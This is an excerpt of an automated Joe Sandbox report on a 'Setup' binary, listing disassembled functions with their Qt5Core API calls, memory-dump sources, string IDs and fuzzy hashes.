                                                                                                                                                                • Part of subcall function 00007FFBA19A12A0: ?beginGroup@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FFBA19A12E1
                                                                                                                                                                • Part of subcall function 00007FFBA19A12A0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA19A12EC
                                                                                                                                                                • Part of subcall function 00007FFBA19A12A0: ??0QString@@QEAA@VQLatin1String@@@Z.QT5CORE ref: 00007FFBA19A131B
                                                                                                                                                                • Part of subcall function 00007FFBA19A12A0: ?beginGroup@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FFBA19A1329
                                                                                                                                                                • Part of subcall function 00007FFBA19A12A0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA19A1334
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A16B3
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A16C2
                                                                                                                                                              • ?toUtf8@QString@@QEGBA?AVQByteArray@@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A16F9
                                                                                                                                                              • ?toHex@QByteArray@@QEBA?AV1@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1706
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1710
                                                                                                                                                              • ?fromLatin1@QString@@SA?AV1@AEBVQByteArray@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A171E
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1728
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1732
                                                                                                                                                                • Part of subcall function 00007FFBA1994440: ?isValid@QDateTime@@QEBA_NXZ.QT5CORE(?,?,00000000,00007FFBA19A1740), ref: 00007FFBA199445A
                                                                                                                                                                • Part of subcall function 00007FFBA1994440: ?currentDateTimeUtc@QDateTime@@SA?AV1@XZ.QT5CORE(?,?,00000000,00007FFBA19A1740), ref: 00007FFBA1994470
                                                                                                                                                                • Part of subcall function 00007FFBA1994440: ??MQDateTime@@QEBA_NAEBV0@@Z.QT5CORE(?,?,00000000,00007FFBA19A1740), ref: 00007FFBA1994481
                                                                                                                                                                • Part of subcall function 00007FFBA1994440: ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA19A1740), ref: 00007FFBA199449C
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A174C
                                                                                                                                                              • ??0QDataStream@@QEAA@PEAVQByteArray@@V?$QFlags@W4OpenModeFlag@QIODevice@@@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1760
                                                                                                                                                                • Part of subcall function 00007FFBA1991640: ??0QDateTime@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA19A1772), ref: 00007FFBA1991653
                                                                                                                                                              • ?toMSecsSinceEpoch@QDateTime@@QEBA_JXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1775
                                                                                                                                                              • ??6QDataStream@@QEAAAEAV0@_J@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1782
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A178C
                                                                                                                                                              • ??6QDataStream@@QEAAAEAV0@_N@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A17A1
                                                                                                                                                              • ?status@QDataStream@@QEBA?AW4Status@1@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A17AB
                                                                                                                                                              • ??1QDataStream@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A17BD
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A17C7
                                                                                                                                                              • ?contains@QSettings@@QEBA_NAEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A17D5
                                                                                                                                                              • ?remove@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A17E7
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A17F1
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1834
                                                                                                                                                              • ??0QVariant@@QEAA@AEBVQByteArray@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1847
                                                                                                                                                              • ?setValue@QSettings@@QEAAXAEBVQString@@AEBVQVariant@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1859
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1863
                                                                                                                                                              • ??1QDataStream@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A186D
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1877
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1893
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A18C7
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A18E0
                                                                                                                                                              • ?endGroup@QSettings@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A190F
                                                                                                                                                              • ?endGroup@QSettings@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1919
                                                                                                                                                                • Part of subcall function 00007FFBA1994410: ?host@QUrl@@QEBA?AVQString@@V?$QFlags@W4ComponentFormattingOption@QUrl@@@@@Z.QT5CORE(?,?,?,00007FFBA19A16F2), ref: 00007FFBA1994420
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$ByteSettings@@$ArrayDate$Array@@Time@@$DataData@@Stream@@String@@@$?data@Flags@Group@$Option@$?allocate@?begin?endAllocationArray@@@Data@@@@@Latin1U1@_V0@@V0@_Variant@@$?contains@?current?from?host@?remove@?set?status@?sync@ComponentDevice@@@@@Epoch@Flag@FormattingHex@Latin1@ModeOpenSecsSinceStatus@1@TimeUrl@@Url@@@@@Utc@Utf8@Valid@Value@Variant@@@Writable@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1518536464-0
                                                                                                                                                              • Opcode ID: dd5911ec83f8c74d223a9d45498f72ffd9abb335a9db8088cbe2606600a1392a
                                                                                                                                                              • Instruction ID: bc1ec550861f0cc7394665c175f36dea85e5d1d074f087bbf06e01acc3467556
                                                                                                                                                              • Opcode Fuzzy Hash: dd5911ec83f8c74d223a9d45498f72ffd9abb335a9db8088cbe2606600a1392a
                                                                                                                                                              • Instruction Fuzzy Hash: 9D8141B2B0A95285EB82DF35D8545BC2362FF84BA9F458132DE1E07664EF3CD54ACB40
                                                                                                                                                              Function 00007FFBA1984DE0 Relevance: 49.1, APIs: 26, Strings: 2, Instructions: 135timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DateTime@@$String@@$?fromByteQt@@@Spec@Time$?data@?index?setArray@@Array@@@Char@@Format@Latin1@String@V0@$$V0@@Valid@sscanf_s
                                                                                                                                                              • String ID: %*3s, %d %3s %d %d:%d:%d 'GMT'$dd-MMM-yy hh:mm:ss 'GMT'
                                                                                                                                                              • API String ID: 907173364-74561969
                                                                                                                                                              • Opcode ID: eabf7b3b1c3b1a63d79122048822a377c7b8e13c467e3b76212e106ebf882688
                                                                                                                                                              • Instruction ID: 564622c6e2cbb259075ee3d08cbafb73417c745def8dbfeeffe080dd249e86fc
                                                                                                                                                              • Opcode Fuzzy Hash: eabf7b3b1c3b1a63d79122048822a377c7b8e13c467e3b76212e106ebf882688
                                                                                                                                                              • Instruction Fuzzy Hash: 48515262A19A128AEB91DF31E8546FC3361FB48B9DF404132DE5E03A58EF3CD549CB40
                                                                                                                                                              Function 00007FFBA1992FD0 Relevance: 46.7, APIs: 31, Instructions: 185timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?clear@QByteArray@@QEAAXXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1992FE6
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1992FF2
                                                                                                                                                              • ??AQByteArray@@QEAA?AVQByteRef@@H@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA199300B
                                                                                                                                                              • ??BQByteRef@@QEBADXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993014
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993030
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993040
                                                                                                                                                              • ??AQByteArray@@QEAA?AVQByteRef@@H@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993059
                                                                                                                                                              • ??BQByteRef@@QEBADXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993062
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993089
                                                                                                                                                              • ??AQByteArray@@QEAA?AVQByteRef@@H@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA19930AB
                                                                                                                                                              • ??8QByteRef@@QEBA_ND@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA19930B6
                                                                                                                                                              • ??AQByteArray@@QEAA?AVQByteRef@@H@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA19930CF
                                                                                                                                                              • ??8QByteRef@@QEBA_ND@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA19930DA
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA19930EA
                                                                                                                                                              • ??AQByteArray@@QEAA?AVQByteRef@@H@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993103
                                                                                                                                                              • ??BQByteRef@@QEBADXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA199310C
                                                                                                                                                              • ??AQByteArray@@QEAA?AVQByteRef@@H@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993129
                                                                                                                                                              • ??BQByteRef@@QEBADXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993132
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA199315D
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA199316E
                                                                                                                                                              • ?mid@QByteArray@@QEBA?AV1@HH@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA199318D
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA199319A
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA19931A5
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA19931E2
                                                                                                                                                              • ??AQByteArray@@QEAA?AVQByteRef@@H@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA19931FB
                                                                                                                                                              • ??BQByteRef@@QEBADXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993204
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA199321B
                                                                                                                                                              • ?mid@QByteArray@@QEBA?AV1@HH@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993237
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993244
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA199324F
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993264
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$Ref@@$Array@@$?size@String@@$?mid@DateTime@@V0@$$V0@@$?append@?clear@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3467974297-0
                                                                                                                                                              • Opcode ID: cd127b828b66d2a0e1b35db07440f04d9e2099411957693213a87d7dda26a7f9
                                                                                                                                                              • Instruction ID: d54e14d8186ab7f4cb71ac03957ce76e53961926078cc3d5a70f7b24bd623676
                                                                                                                                                              • Opcode Fuzzy Hash: cd127b828b66d2a0e1b35db07440f04d9e2099411957693213a87d7dda26a7f9
                                                                                                                                                              • Instruction Fuzzy Hash: F67182B2A0E60286EB958F36E8540BC23A5FF95B99F444031CD1A07764EF3DE94ACF40
                                                                                                                                                              Function 00007FFBA1A01E00 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 204COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$free$malloc$?load@?utf16@E__@@ErrorInit_thread_footerLastLatin1Library@@String@@@SystemV0@@memset
                                                                                                                                                              • String ID: Advapi32$GetUserNameW$LookupAccountNameW
                                                                                                                                                              • API String ID: 900276279-4047347623
                                                                                                                                                              • Opcode ID: ed1fc3348ec75a61bb30519bb29344f8008f8db8524b79e9257e0618569e42ed
                                                                                                                                                              • Instruction ID: c74ccd92e44b0361edc8570456e1a56d6a127f6ef5c49e15fc9b64b9b039ff43
                                                                                                                                                              • Opcode Fuzzy Hash: ed1fc3348ec75a61bb30519bb29344f8008f8db8524b79e9257e0618569e42ed
                                                                                                                                                              • Instruction Fuzzy Hash: 62B14DB2A0EB8296EB91CB30E4501AD77A5FB44754F404137DEAE46A58EF7CE549CF00
                                                                                                                                                              Function 00007FFBA1993290 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 152timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA19932A4
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE ref: 00007FFBA19932B1
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA19932BC
                                                                                                                                                              • ?clear@QByteArray@@QEAAXXZ.QT5CORE ref: 00007FFBA19932D7
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE ref: 00007FFBA19932E0
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ?clear@QByteArray@@QEAAXXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1992FE6
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1992FF2
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ??AQByteArray@@QEAA?AVQByteRef@@H@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA199300B
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ??BQByteRef@@QEBADXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993014
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993030
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993040
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ??AQByteArray@@QEAA?AVQByteRef@@H@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993059
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ??BQByteRef@@QEBADXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993062
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993089
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ??AQByteArray@@QEAA?AVQByteRef@@H@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA19930AB
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ??8QByteRef@@QEBA_ND@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA19930B6
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ??AQByteArray@@QEAA?AVQByteRef@@H@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA19930CF
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ??8QByteRef@@QEBA_ND@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA19930DA
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA19930EA
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ??AQByteArray@@QEAA?AVQByteRef@@H@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993103
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ??BQByteRef@@QEBADXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA199310C
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA199315D
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA199316E
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE ref: 00007FFBA199330A
                                                                                                                                                              • ?qstrcmp@@YAHAEBVQByteArray@@PEBD@Z.QT5CORE ref: 00007FFBA1993323
                                                                                                                                                              • ??AQByteArray@@QEAA?AVQByteRef@@H@Z.QT5CORE ref: 00007FFBA199333D
                                                                                                                                                              • ??BQByteRef@@QEBADXZ.QT5CORE ref: 00007FFBA1993346
                                                                                                                                                              • memchr.VCRUNTIME140 ref: 00007FFBA199338E
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA19933AF
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ??AQByteArray@@QEAA?AVQByteRef@@H@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993129
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ??BQByteRef@@QEBADXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993132
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ?mid@QByteArray@@QEBA?AV1@HH@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA199318D
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA199319A
                                                                                                                                                                • Part of subcall function 00007FFBA1992FD0: ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA19931A5
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA19933CA
                                                                                                                                                              • ?qstrcmp@@YAHAEBVQByteArray@@PEBD@Z.QT5CORE ref: 00007FFBA19933DB
                                                                                                                                                              • ?qstrcmp@@YAHAEBVQByteArray@@PEBD@Z.QT5CORE ref: 00007FFBA1993404
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE ref: 00007FFBA1993422
                                                                                                                                                              • ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1993439
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1993479
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1993484
                                                                                                                                                                • Part of subcall function 00007FFBA19936B0: ?compare@QByteArray@@QEBAHPEBDW4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FFBA19936D5
                                                                                                                                                                • Part of subcall function 00007FFBA19936B0: ?size@QString@@QEBAHXZ.QT5CORE ref: 00007FFBA19936EF
                                                                                                                                                                • Part of subcall function 00007FFBA19936B0: ?at@QByteArray@@QEBADH@Z.QT5CORE ref: 00007FFBA19936FF
                                                                                                                                                                • Part of subcall function 00007FFBA19936B0: ?size@QString@@QEBAHXZ.QT5CORE ref: 00007FFBA199370C
                                                                                                                                                                • Part of subcall function 00007FFBA19936B0: ?mid@QByteArray@@QEBA?AV1@HH@Z.QT5CORE ref: 00007FFBA1993724
                                                                                                                                                                • Part of subcall function 00007FFBA19936B0: ?size@QString@@QEBAHXZ.QT5CORE ref: 00007FFBA199373F
                                                                                                                                                                • Part of subcall function 00007FFBA19936B0: ?toLongLong@QByteArray@@QEBA_JPEA_NH@Z.QT5CORE ref: 00007FFBA199375E
                                                                                                                                                                • Part of subcall function 00007FFBA19936B0: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA199377D
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE ref: 00007FFBA1993493
                                                                                                                                                              • ?qstrcmp@@YAHAEBVQByteArray@@PEBD@Z.QT5CORE ref: 00007FFBA19934A8
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE ref: 00007FFBA19934B5
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA19934D8
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA19934E3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
